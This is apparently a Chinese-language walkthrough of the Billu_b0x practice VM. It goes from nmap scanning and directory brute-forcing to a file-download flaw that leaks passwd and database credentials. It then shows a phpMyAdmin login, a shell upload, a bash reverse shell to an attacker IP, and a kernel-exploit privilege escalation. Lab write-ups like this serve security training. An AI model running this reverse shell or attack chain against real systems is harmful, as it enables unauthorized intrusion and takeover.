Billu_b0x靶场复现
环境准备:
Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址
kali linux 2020虚拟机,ip地址192.168.120.133
kali linux 2020虚拟机,ip地址192.168.120.141
1.信息收集
nmap -sP 192.168.1.0/24
使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141
主机发现:nmap -sP 192.168.120.0/24
2.端口及服务扫描
使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描
nmap -p1-65535 -A 192.168.120.141
从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下
使用御剑扫描文件
得到页面较多,head.Php test.php、in.php、c.php、index.php、show.php等
3.漏洞挖掘
访问test.php:页面提示file参数为空,需要提供file参数
这里存在文件下载漏洞:下载passwd文件和c.php文件
Passwd存在一些用户:games,deamon,gnats,ica
查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root
并且c.php文件中存在数据库连接配置信息(http://192.168.120.141/phpmy/)
Image目录
通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面,登录后查看web用户名密码:biLLu hEx_it
进入网站
在添加用户处存在上传点,尝试文件上传获取shell,可能存在
文件包含漏洞(失败)
在show—user中复制图片url:http://192.168.120.141/uploaded_images/a.jpg,
将bash先进行base64后面url编码
echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash
在kali开启尝试反弹shell
反弹成功
.将bash先进行base64后面url编码
echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash
反弹shell成功
查看内核版本和当前权限
查找exp:searchsploit -s linux kernel 3.13.0
查找exp路径并且复制到/root目录下
开启http服务进行远程下载
下载完成在/tmp目录下
然后gcc编译执行后,提权成功